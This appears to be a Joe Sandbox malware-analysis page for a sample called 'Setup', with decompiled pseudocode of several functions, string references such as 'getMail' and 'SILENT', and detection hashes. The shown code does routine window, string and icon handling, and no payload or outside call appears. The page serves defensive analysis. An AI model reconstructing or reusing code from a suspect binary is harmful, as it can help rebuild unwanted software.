									 *[fs:0x0] = _v16;
									return _t65;
								}
								__eflags = ( *(E004051D0(_t82, _a4 + 4, _t123, _t124, _v24)) & 0x0000ffff) - 0x3a;
								if(__eflags == 0) {
									_v24 = E00405230(_a4 + 4, __eflags, " ", _v24 + 1);
									__eflags = _v24 - 0xffffffff;
									if(_v24 == 0xffffffff) {
										L17:
										_t65 = 0;
										goto L21;
									}
									_t70 = E004051D0(_t82, _a4 + 4, _t123, _t124, _v24);
									__eflags = ( *_t70 & 0x0000ffff) - 0x22;
									if(( *_t70 & 0x0000ffff) == 0x22) {
										_v24 = _v24 + 1;
										_v20 = E004468C0(_a4 + 4, 0x22, _v24);
										__eflags = _v20 - 0xffffffff;
										if(_v20 != 0xffffffff) {
											__eflags = _a4 + 4;
											_v60 = E00405260(_a4 + 4,  &_v52, _v24, _v20 - _v24);
											_v64 = _v60;
											_v8 = 0;
											E00409880(_a12, __eflags, _v64);
											_v8 = 0xffffffff;
											E004178C0( &_v52);
											_t65 = 1;
										} else {
											_t65 = 0;
										}
										goto L21;
									}
									goto L17;
								}
								goto L14;
							}
							L11:
							__eflags = 1;
							if(1 != 0) {
								continue;
							}
							goto L12;
						}
						_t81 = E00451A16(L" {\",",  *(E004051D0(_t82, _a4 + 4, _t123, _t124, _v24 - 1)) & 0x0000ffff);
						_t127 = _t127 + 8;
						__eflags = _t81;
						if(_t81 != 0) {
							goto L8;
						}
						_v24 = _v24 + 1;
						goto L11;
					}
					_t65 = 0;
					goto L21;
				}
				_t65 = 0;
				goto L21;
			}






















                                                                                                                                                              0x004f0440
                                                                                                                                                              0x004f0440
                                                                                                                                                              0x004f0440
                                                                                                                                                              0x004f0443
                                                                                                                                                              0x004f0445
                                                                                                                                                              0x004f0450
                                                                                                                                                              0x004f0451
                                                                                                                                                              0x004f0454
                                                                                                                                                              0x004f045b
                                                                                                                                                              0x004f045f
                                                                                                                                                              0x004f0465
                                                                                                                                                              0x004f046c
                                                                                                                                                              0x004f0475
                                                                                                                                                              0x004f047c
                                                                                                                                                              0x004f048f
                                                                                                                                                              0x004f0492
                                                                                                                                                              0x004f0496
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f049f
                                                                                                                                                              0x004f04a3
                                                                                                                                                              0x004f04d7
                                                                                                                                                              0x004f04e6
                                                                                                                                                              0x004f0501
                                                                                                                                                              0x004f0506
                                                                                                                                                              0x004f0509
                                                                                                                                                              0x004f050b
                                                                                                                                                              0x004f051e
                                                                                                                                                              0x004f0532
                                                                                                                                                              0x004f0535
                                                                                                                                                              0x004f0539
                                                                                                                                                              0x004f0552
                                                                                                                                                              0x004f0552
                                                                                                                                                              0x004f0602
                                                                                                                                                              0x004f0605
                                                                                                                                                              0x004f0610
                                                                                                                                                              0x004f0610
                                                                                                                                                              0x004f054d
                                                                                                                                                              0x004f0550
                                                                                                                                                              0x004f0570
                                                                                                                                                              0x004f0573
                                                                                                                                                              0x004f0577
                                                                                                                                                              0x004f0590
                                                                                                                                                              0x004f0590
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0590
                                                                                                                                                              0x004f0583
                                                                                                                                                              0x004f058b
                                                                                                                                                              0x004f058e
                                                                                                                                                              0x004f059a
                                                                                                                                                              0x004f05ae
                                                                                                                                                              0x004f05b1
                                                                                                                                                              0x004f05b5
                                                                                                                                                              0x004f05cd
                                                                                                                                                              0x004f05d5
                                                                                                                                                              0x004f05db
                                                                                                                                                              0x004f05de
                                                                                                                                                              0x004f05ec
                                                                                                                                                              0x004f05f1
                                                                                                                                                              0x004f05fb
                                                                                                                                                              0x004f0600
                                                                                                                                                              0x004f05b7
                                                                                                                                                              0x004f05b7
                                                                                                                                                              0x004f05b7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f05b5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f058e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0550
                                                                                                                                                              0x004f0511
                                                                                                                                                              0x004f0516
                                                                                                                                                              0x004f0518
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0518
                                                                                                                                                              0x004f04c0
                                                                                                                                                              0x004f04c5
                                                                                                                                                              0x004f04c8
                                                                                                                                                              0x004f04ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f04d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f04d2
                                                                                                                                                              0x004f0498
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0498
                                                                                                                                                              0x004f046e
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :"$ {",
                                                                                                                                                              • API String ID: 0-2208196758
                                                                                                                                                              • Opcode ID: f031f3fa4ac938f2b817baabfdce8d8ae56471382f4ec89a465f4afe541d00d3
                                                                                                                                                              • Instruction ID: 4a0d8f4aa3ebc0104b72774a5acafe2e7dd2801f8f0091a06b8487880b9cf539
                                                                                                                                                              • Opcode Fuzzy Hash: f031f3fa4ac938f2b817baabfdce8d8ae56471382f4ec89a465f4afe541d00d3
                                                                                                                                                              • Instruction Fuzzy Hash: D551307190010DAFDB04DF98C955BBF7775EF84318F20422EE616BB382D6789A05CB6A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405E90 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00405E90(struct HWND__* _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				intOrPtr* _v56;
				void* __ecx;
				signed int _t62;
				intOrPtr _t83;
				void* _t86;
				intOrPtr* _t95;
				signed int _t133;
				void* _t134;

				_push(0xffffffff);
				_push(0x518428);
				_push( *[fs:0x0]);
				_push(_t95);
				_t62 =  *0x561244; // 0xddd124f9
				_push(_t62 ^ _t133);
				 *[fs:0x0] =  &_v16;
				_v20 = _t134 - 0x24;
				_v56 = _t95;
				_v24 = 0xffffffff;
				_v8 = 0;
				if( *((intOrPtr*)(_v56 + 0xa4)) == 0) {
					if(IsWindow(_a4) != 0) {
						 *((intOrPtr*)(_v56 + 0x84)) = _a4;
						_v24 = 1;
						_v28 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x70))))(_v56, _v56 + 0xc8);
						if(_v28 == 0) {
							_v24 = 3;
							E00414C90();
							_v8 = 1;
							 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x6c))))(_v56,  &_v36);
							_v28 = E00409BF0(_a4, 0xffffffff,  &_v32, E0041D530(_v56 + 0xc8), _v36, 0);
							if(_v28 == 0) {
								_v24 = 5;
								_v28 = E00401580(E0041D530( &_v32), _a8);
								if(_v28 != 0) {
									_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x60))))(_v56, 5, L"Webb::failed to start sink");
									_push(_v28);
									_push(L"Webb::failed to start sink(%x)");
									E004CC5C0(_t86);
								}
								 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x74))))(_v56, E0041D530( &_v32));
								_v48 = 0;
								_v8 = 0;
								E0040D320();
								_t83 = _v48;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x60))))(_v56, 4, L"Webb:: create inner control failed");
								_push(_v28);
								_push(L"Webb:: create inner control faile (%x)");
								E004CC5C0(_v28);
								_v44 = _v28;
								_v8 = 0;
								E0040D320();
								_t83 = _v44;
							}
						} else {
							_t83 = _v28;
						}
					} else {
						_t83 = 0x80070057;
					}
				} else {
					_t83 = 0x80004004;
				}
				 *[fs:0x0] = _v16;
				return _t83;
			}




















                                                                                                                                                              0x00405e93
                                                                                                                                                              0x00405e95
                                                                                                                                                              0x00405ea0
                                                                                                                                                              0x00405ea1
                                                                                                                                                              0x00405ea8
                                                                                                                                                              0x00405eaf
                                                                                                                                                              0x00405eb3
                                                                                                                                                              0x00405eb9
                                                                                                                                                              0x00405ebc
                                                                                                                                                              0x00405ebf
                                                                                                                                                              0x00405ec6
                                                                                                                                                              0x00405ed7
                                                                                                                                                              0x00405eef
                                                                                                                                                              0x00405f01
                                                                                                                                                              0x00405f07
                                                                                                                                                              0x00405f26
                                                                                                                                                              0x00405f2d
                                                                                                                                                              0x00405f37
                                                                                                                                                              0x00405f41
                                                                                                                                                              0x00405f46
                                                                                                                                                              0x00405f5a
                                                                                                                                                              0x00405f83
                                                                                                                                                              0x00405f8a
                                                                                                                                                              0x00405fcc
                                                                                                                                                              0x00405fe8
                                                                                                                                                              0x00405fef
                                                                                                                                                              0x00406004
                                                                                                                                                              0x00406009
                                                                                                                                                              0x0040600a
                                                                                                                                                              0x0040600f
                                                                                                                                                              0x00406014
                                                                                                                                                              0x0040602c
                                                                                                                                                              0x0040602e
                                                                                                                                                              0x00406035
                                                                                                                                                              0x0040603c
                                                                                                                                                              0x00406041
                                                                                                                                                              0x00405f8c
                                                                                                                                                              0x00405f9f
                                                                                                                                                              0x00405fa4
                                                                                                                                                              0x00405fa5
                                                                                                                                                              0x00405faa
                                                                                                                                                              0x00405fb5
                                                                                                                                                              0x00405fb8
                                                                                                                                                              0x00405fbf
                                                                                                                                                              0x00405fc4
                                                                                                                                                              0x00405fc4
                                                                                                                                                              0x00405f2f
                                                                                                                                                              0x00405f2f
                                                                                                                                                              0x00405f2f
                                                                                                                                                              0x00405ef1
                                                                                                                                                              0x00405ef1
                                                                                                                                                              0x00405ef1
                                                                                                                                                              0x00405ed9
                                                                                                                                                              0x00405ed9
                                                                                                                                                              0x00405ed9
                                                                                                                                                              0x0040608e
                                                                                                                                                              0x0040609c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Webb::failed to start sink, xrefs: 00405FF1
                                                                                                                                                              • Webb::failed to start sink(%x), xrefs: 0040600A
                                                                                                                                                              • Webb:: create inner control failed, xrefs: 00405F8C
                                                                                                                                                              • Webb:: create inner control faile (%x), xrefs: 00405FA5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window
                                                                                                                                                              • String ID: Webb:: create inner control faile (%x)$Webb:: create inner control failed$Webb::failed to start sink$Webb::failed to start sink(%x)
                                                                                                                                                              • API String ID: 2353593579-1275530296
                                                                                                                                                              • Opcode ID: 474e3da82e0cc466d048fbfad2a84c99366ed9459d03b0eb0226204c4c524e49
                                                                                                                                                              • Instruction ID: 0902af705790d79e5c6307455ef4b9087a03f906983d013e0f34a35d235ffbcd
                                                                                                                                                              • Opcode Fuzzy Hash: 474e3da82e0cc466d048fbfad2a84c99366ed9459d03b0eb0226204c4c524e49
                                                                                                                                                              • Instruction Fuzzy Hash: AC513A71A01509AFDB04EF98D981FEEBBB5FF48304F204169F506A7290D738AE45CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F3180 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004F3180(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v52;
				signed int _v64;
				signed int _v72;
				char _v73;
				char _v108;
				char _v109;
				intOrPtr _v116;
				signed int _v120;
				char _v152;
				char _v153;
				char _v200;
				intOrPtr _v204;
				intOrPtr* _v208;
				signed int _v212;
				signed int _v216;
				signed int _t62;
				signed int _t63;
				signed char _t69;
				signed int _t70;
				intOrPtr _t84;
				void* _t101;
				void* _t138;
				void* _t139;
				signed int _t140;
				void* _t147;

				_t147 = __fp0;
				_t139 = __esi;
				_t138 = __edi;
				_t101 = __ebx;
				_push(0xffffffff);
				_push(0x50f734);
				_push( *[fs:0x0]);
				_t62 =  *0x561244; // 0xddd124f9
				_t63 = _t62 ^ _t140;
				_v20 = _t63;
				_push(_t63);
				 *[fs:0x0] =  &_v16;
				_v208 = __ecx;
				E004175C0(E00434050( &_v73));
				_v8 = 0;
				_t144 = _a12;
				if(_a12 == 0) {
					E00416600( &_v52,  &_v52, L"{offline:\"%d\"}", _a8);
				} else {
					E00417910(_a12, E00434050( &_v109));
					_v8 = 1;
					E004181D0( &_v52,  &_v108);
					_v8 = 0;
					E004176E0();
					__imp__#6(_a12);
				}
				_t69 = E004F2770(_t101, _v208, _t138, _t139, _t144, _t147);
				_t135 = _t69 & 0x000000ff;
				if((_t69 & 0x000000ff) != 0) {
					_t70 = E004F2350(_v208);
					__eflags = _t70;
					if(_t70 < 0) {
						E004F2370(_t101, _v208, _t138, _t139);
					}
					E00417910(L"ML", E00434050( &_v153));
					_v8 = 2;
					_v212 = E00501530(E00501CE0(), __eflags,  &_v200,  &_v152);
					_t135 = _v212;
					_v216 = _v212;
					_v8 = 3;
					_v120 = E00404760(_v216, 0);
					_v8 = 2;
					E004224B0();
					_v8 = 0;
					E004176E0();
					__eflags = _v120;
					if(_v120 != 0) {
						E00416A10( &_v72);
						_v8 = 4;
						 *((intOrPtr*)( *((intOrPtr*)( *_v208 + 0x80))))(_v208, L"getMail", 0, 0,  &_v72);
						_t135 = _v72 & 0x0000ffff;
						__eflags = (_v72 & 0x0000ffff) - 8;
						if((_v72 & 0x0000ffff) == 8) {
							__eflags =  *_v64 & 0x0000ffff;
							if(( *_v64 & 0x0000ffff) != 0) {
								_t135 = _v64;
								E004048A0(E00404820(), _v64);
							}
						}
						_v8 = 0;
						E00417430( &_v72);
					}
					E004E6990(E004049B0());
					E004F30E0(_t101, _v208, _t138, _t139, __eflags, _t147,  &_v52);
					_v204 = 0;
					_v8 = 0xffffffff;
					E004176E0();
					_t84 = _v204;
				} else {
					_v116 = 0;
					_v8 = 0xffffffff;
					E004176E0();
					_t84 = _v116;
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t84, _t101, _v20 ^ _t140, _t135, _t138, _t139);
			}































                                                                                                                                                              0x004f3180
                                                                                                                                                              0x004f3180
                                                                                                                                                              0x004f3180
                                                                                                                                                              0x004f3180
                                                                                                                                                              0x004f3183
                                                                                                                                                              0x004f3185
                                                                                                                                                              0x004f3190
                                                                                                                                                              0x004f3197
                                                                                                                                                              0x004f319c
                                                                                                                                                              0x004f319e
                                                                                                                                                              0x004f31a1
                                                                                                                                                              0x004f31a5
                                                                                                                                                              0x004f31ab
                                                                                                                                                              0x004f31bd
                                                                                                                                                              0x004f31c2
                                                                                                                                                              0x004f31c9
                                                                                                                                                              0x004f31cd
                                                                                                                                                              0x004f3219
                                                                                                                                                              0x004f31cf
                                                                                                                                                              0x004f31df
                                                                                                                                                              0x004f31e4
                                                                                                                                                              0x004f31ef
                                                                                                                                                              0x004f31f4
                                                                                                                                                              0x004f31fb
                                                                                                                                                              0x004f3204
                                                                                                                                                              0x004f3204
                                                                                                                                                              0x004f3227
                                                                                                                                                              0x004f322c
                                                                                                                                                              0x004f3231
                                                                                                                                                              0x004f3257
                                                                                                                                                              0x004f325c
                                                                                                                                                              0x004f325e
                                                                                                                                                              0x004f3266
                                                                                                                                                              0x004f3266
                                                                                                                                                              0x004f3282
                                                                                                                                                              0x004f3287
                                                                                                                                                              0x004f32a5
                                                                                                                                                              0x004f32ab
                                                                                                                                                              0x004f32b1
                                                                                                                                                              0x004f32b7
                                                                                                                                                              0x004f32c8
                                                                                                                                                              0x004f32cb
                                                                                                                                                              0x004f32d5
                                                                                                                                                              0x004f32da
                                                                                                                                                              0x004f32e4
                                                                                                                                                              0x004f32e9
                                                                                                                                                              0x004f32ed
                                                                                                                                                              0x004f32f2
                                                                                                                                                              0x004f32f7
                                                                                                                                                              0x004f331d
                                                                                                                                                              0x004f331f
                                                                                                                                                              0x004f3323
                                                                                                                                                              0x004f3326
                                                                                                                                                              0x004f332e
                                                                                                                                                              0x004f3330
                                                                                                                                                              0x004f3332
                                                                                                                                                              0x004f333d
                                                                                                                                                              0x004f333d
                                                                                                                                                              0x004f3330
                                                                                                                                                              0x004f3342
                                                                                                                                                              0x004f3349
                                                                                                                                                              0x004f3349
                                                                                                                                                              0x004f3355
                                                                                                                                                              0x004f3364
                                                                                                                                                              0x004f3369
                                                                                                                                                              0x004f3373
                                                                                                                                                              0x004f337d
                                                                                                                                                              0x004f3382
                                                                                                                                                              0x004f3233
                                                                                                                                                              0x004f3233
                                                                                                                                                              0x004f323a
                                                                                                                                                              0x004f3244
                                                                                                                                                              0x004f3249
                                                                                                                                                              0x004f3249
                                                                                                                                                              0x004f338b
                                                                                                                                                              0x004f33a0

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$FreeString
                                                                                                                                                              • String ID: getMail${offline:"%d"}
                                                                                                                                                              • API String ID: 4250984490-2278394474
                                                                                                                                                              • Opcode ID: 94f43a87b8817557d57f875c6742cae7e3f05bf0f175234f9bbc4f0b827b4953
                                                                                                                                                              • Instruction ID: 0b00b0d10cad26ea970f4bd532ae3d9bcf03c87f8020568c9a7219c3257146db
                                                                                                                                                              • Opcode Fuzzy Hash: 94f43a87b8817557d57f875c6742cae7e3f05bf0f175234f9bbc4f0b827b4953
                                                                                                                                                              • Instruction Fuzzy Hash: 7E515A709012189BDB18EFA5DD51FEEB7B4BF50304F1041AEE509A72D1DB786E44CBA8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F0CB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E004F0CB0(void* __ebx, struct HWND__* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				long _v8;
				char _v16;
				char _v20;
				char _v52;
				char _v53;
				char _v88;
				char _v89;
				struct HWND__* _v96;
				intOrPtr _v100;
				signed int _t32;
				int _t36;
				signed int _t54;

				_push(0xffffffff);
				_push(0x507d0c);
				_push( *[fs:0x0]);
				_t32 =  *0x561244; // 0xddd124f9
				_push(_t32 ^ _t54);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				_v100 = _a4;
				_v100 = _v100 + 4;
				if(_v100 > 0x68) {
					L6:
					_t36 = 0;
				} else {
					_t9 = _v100 + 0x4f0e10; // 0xcccccc03
					switch( *((intOrPtr*)(( *_t9 & 0x000000ff) * 4 +  &M004F0DFC))) {
						case 0:
							__ecx =  &_v89;
							__eax = E00434050( &_v89);
							__ecx =  &_v88;
							__eax = E00417910(L"SILENT", __eax);
							_v8 = 1;
							__edx =  &_v88;
							__ecx = 0x5bde88;
							__eax = E004181D0(0x5bde88,  &_v88);
							_v8 = 0xffffffff;
							__ecx =  &_v88;
							__eax = E004176E0();
							__eax =  *0x5bdd34; // 0x80078
							__eax = PostMessageW(__eax, 0x402, 1, 0);
							goto L7;
						case 1:
							__ecx = _v96;
							__edx =  *((intOrPtr*)(__ecx + 0x12c));
							__edx =  *((intOrPtr*)(__ecx + 0x12c)) - 1;
							__ecx = _v96;
							__eax = E004F0B90(__ebx, _v96, __edx, __edi, __esi, __edx);
							goto L7;
						case 2:
							E004161E0(E00416210(_v96 + 0x84,  &_v20), 0x10, _a4, 0);
							goto L7;
						case 3:
							__ecx =  &_v53;
							__eax = E00434050( &_v53);
							__ecx =  &_v52;
							__eax = E00417910(L"DONE", __eax);
							_v8 = 0;
							__eax =  &_v52;
							__ecx = 0x5bde88;
							__eax = E004181D0(0x5bde88,  &_v52);
							_v8 = 0xffffffff;
							__ecx =  &_v52;
							__eax = E004176E0();
							__ecx =  *0x5bdd34; // 0x80078
							__eax = PostMessageW(__ecx, 0x406, 1, 0);
							L7:
							_t36 = 1;
							goto L8;
						case 4:
							goto L6;
					}
				}
				L8:
				 *[fs:0x0] = _v16;
				return _t36;
			}















                                                                                                                                                              0x004f0cb3
                                                                                                                                                              0x004f0cb5
                                                                                                                                                              0x004f0cc0
                                                                                                                                                              0x004f0cc4
                                                                                                                                                              0x004f0ccb
                                                                                                                                                              0x004f0ccf
                                                                                                                                                              0x004f0cd5
                                                                                                                                                              0x004f0cdb
                                                                                                                                                              0x004f0ce4
                                                                                                                                                              0x004f0ceb
                                                                                                                                                              0x004f0de2
                                                                                                                                                              0x004f0de2
                                                                                                                                                              0x004f0cf1
                                                                                                                                                              0x004f0cf4
                                                                                                                                                              0x004f0cfb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0d7a
                                                                                                                                                              0x004f0d7d
                                                                                                                                                              0x004f0d88
                                                                                                                                                              0x004f0d8b
                                                                                                                                                              0x004f0d90
                                                                                                                                                              0x004f0d97
                                                                                                                                                              0x004f0d9b
                                                                                                                                                              0x004f0da0
                                                                                                                                                              0x004f0da5
                                                                                                                                                              0x004f0dac
                                                                                                                                                              0x004f0daf
                                                                                                                                                              0x004f0dbd
                                                                                                                                                              0x004f0dc3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0dcb
                                                                                                                                                              0x004f0dce
                                                                                                                                                              0x004f0dd4
                                                                                                                                                              0x004f0dd8
                                                                                                                                                              0x004f0ddb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0d1e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0d28
                                                                                                                                                              0x004f0d2b
                                                                                                                                                              0x004f0d36
                                                                                                                                                              0x004f0d39
                                                                                                                                                              0x004f0d3e
                                                                                                                                                              0x004f0d45
                                                                                                                                                              0x004f0d49
                                                                                                                                                              0x004f0d4e
                                                                                                                                                              0x004f0d53
                                                                                                                                                              0x004f0d5a
                                                                                                                                                              0x004f0d5d
                                                                                                                                                              0x004f0d6b
                                                                                                                                                              0x004f0d72
                                                                                                                                                              0x004f0de6
                                                                                                                                                              0x004f0de6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f0cfb
                                                                                                                                                              0x004f0de8
                                                                                                                                                              0x004f0deb
                                                                                                                                                              0x004f0df6

                                                                                                                                                              APIs
                                                                                                                                                              • PostMessageW.USER32(00080078,00000406,00000001,00000000), ref: 004F0D72
                                                                                                                                                              • PostMessageW.USER32(00080078,00000402,00000001,00000000), ref: 004F0DC3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                              • String ID: DONE$SILENT$h
                                                                                                                                                              • API String ID: 410705778-1397473427
                                                                                                                                                              • Opcode ID: bd0b44ee22a918ce0de0a3c68db5ef7cb4e7a728f43999ecf7e7c2e164909423
                                                                                                                                                              • Instruction ID: b521facae403294bf25b0b7f8936e62260cfcf800c29164a3d36239f9ae750ec
                                                                                                                                                              • Opcode Fuzzy Hash: bd0b44ee22a918ce0de0a3c68db5ef7cb4e7a728f43999ecf7e7c2e164909423
                                                                                                                                                              • Instruction Fuzzy Hash: AF318C70A14208ABDB08DFD4DC56BEEB775FB84710F10862EE6126B2C2DB796905CB58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004CAE60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                              			E004CAE60(void* __ebx, struct HINSTANCE__** __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8) {
				int _v8;
				signed int _v12;
				short _v44;
				int _v48;
				struct HINSTANCE__** _v52;
				signed int _t15;
				void* _t18;
				void* _t29;
				void* _t43;
				void* _t44;
				signed int _t45;

				_t44 = __esi;
				_t43 = __edi;
				_t29 = __ebx;
				_t15 =  *0x561244; // 0xddd124f9
				_v12 = _t15 ^ _t45;
				_v52 = __ecx;
				if(E00430C20(_v52) == 0) {
					_t18 = 0;
				} else {
					wsprintfW( &_v44, L"icon%d", _a4);
					asm("sbb edx, edx");
					_v48 = GetSystemMetrics(( ~_a8 & 0xffffffda) + 0x31);
					asm("sbb eax, eax");
					_v8 = GetSystemMetrics(( ~_a8 & 0xffffffda) + 0x32);
					_t37 =  *_v52;
					_t18 = LoadImageW( *_v52,  &_v44, 1, _v48, _v8, 0);
				}
				return E0044F6C8(_t18, _t29, _v12 ^ _t45, _t37, _t43, _t44);
			}














                                                                                                                                                              0x004cae60
                                                                                                                                                              0x004cae60
                                                                                                                                                              0x004cae60
                                                                                                                                                              0x004cae66
                                                                                                                                                              0x004cae6d
                                                                                                                                                              0x004cae70
                                                                                                                                                              0x004cae7d
                                                                                                                                                              0x004caee3
                                                                                                                                                              0x004cae7f
                                                                                                                                                              0x004cae8c
                                                                                                                                                              0x004cae9a
